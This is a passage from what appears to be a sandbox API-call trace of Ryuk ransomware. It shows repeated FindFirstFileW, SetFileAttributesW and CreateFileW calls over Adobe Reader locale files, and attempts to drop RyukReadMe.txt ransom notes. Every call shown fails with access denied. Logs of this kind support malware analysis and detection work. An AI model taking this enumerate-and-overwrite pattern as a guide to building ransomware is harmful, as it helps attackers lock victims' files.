(x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\reflow.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.440] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.440] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.440] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT", dwFileAttributes=0x80) returned 0 [0138.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\saveasrtf.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.441] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.441] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.441] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.441] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT", dwFileAttributes=0x80) returned 0 [0138.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Search.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\search.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.442] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.442] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.442] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.442] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT", dwFileAttributes=0x80) returned 0 [0138.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\sendmail.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.443] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.443] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.443] SetLastError (dwErrCode=0x0) [0138.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.444] GetLastError () returned 0x5 [0138.444] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.444] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.444] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.444] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.445] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.445] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\DEXShare.asfx", dwFileAttributes=0x80) returned 0 [0138.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.446] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\Services.asfx", dwFileAttributes=0x80) returned 0 [0138.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.448] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.448] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.448] SetLastError (dwErrCode=0x0) [0138.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.448] GetLastError () returned 0x5 [0138.448] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.448] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT", dwFileAttributes=0x80) returned 0 [0138.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Spelling.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\spelling.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.449] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.449] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.449] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.449] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT", dwFileAttributes=0x80) returned 0 [0138.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\updater.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.452] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.452] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.452] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.452] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT", dwFileAttributes=0x80) returned 0 [0138.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\weblink.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.452] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.452] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.452] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.453] SetLastError (dwErrCode=0x0) [0138.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.453] GetLastError () returned 0x5 [0138.453] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.453] SetLastError (dwErrCode=0x0) [0138.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.453] GetLastError () returned 0x5 [0138.453] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.453] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.455] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.455] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.455] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.455] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\accessibility.CZE", dwFileAttributes=0x80) returned 0 [0138.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\accessibility.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\accessibility.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.456] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.457] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.457] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Acroform.CZE", dwFileAttributes=0x80) returned 0 [0138.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Acroform.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\acroform.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.458] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.458] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.472] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\AdobeCollabSync.CZE", dwFileAttributes=0x80) returned 0 [0138.473] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\AdobeCollabSync.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\adobecollabsync.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.473] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.473] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.473] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.473] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Annots.CZE", dwFileAttributes=0x80) returned 0 [0138.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Annots.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\annots.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.474] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.474] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.474] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\BRdlang32.CZE", dwFileAttributes=0x80) returned 0 [0138.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\BRdlang32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\brdlang32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.475] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.475] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.475] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.475] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Checkers.CZE", dwFileAttributes=0x80) returned 0 [0138.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Checkers.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\checkers.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.475] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.475] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.475] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.476] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DigSig.CZE", dwFileAttributes=0x80) returned 0 [0138.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DigSig.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\digsig.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.476] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.476] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.476] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.476] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DVA.CZE", dwFileAttributes=0x80) returned 0 [0138.477] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DVA.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\dva.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.477] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.477] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.477] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.477] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\eBook.CZE", dwFileAttributes=0x80) returned 0 [0138.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\eBook.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ebook.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.478] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.478] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.478] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.478] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\EScript.CZE", dwFileAttributes=0x80) returned 0 [0138.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\EScript.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\escript.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.478] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.478] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.479] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.479] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\IA32.CZE", dwFileAttributes=0x80) returned 0 [0138.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\IA32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ia32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.479] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.479] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.479] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.479] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\makeaccessible.CZE", dwFileAttributes=0x80) returned 0 [0138.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\makeaccessible.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\makeaccessible.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.480] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.480] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.480] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.480] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Multimedia.CZE", dwFileAttributes=0x80) returned 0 [0138.480] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Multimedia.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\multimedia.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.481] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.481] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.481] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.481] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\pddom.CZE", dwFileAttributes=0x80) returned 0 [0138.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\pddom.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\pddom.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.482] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.482] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.482] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\PPKLite.CZE", dwFileAttributes=0x80) returned 0 [0138.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\PPKLite.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ppklite.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.482] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.482] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.483] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\RdLang32.CZE", dwFileAttributes=0x80) returned 0 [0138.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\RdLang32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\rdlang32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.483] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.483] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.483] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.483] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\ReadOutLoud.CZE", dwFileAttributes=0x80) returned 0 [0138.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\ReadOutLoud.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\readoutloud.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.484] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.484] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.484] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.484] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\reflow.CZE", dwFileAttributes=0x80) returned 0 [0138.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\reflow.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\reflow.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.485] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.485] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.485] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.485] 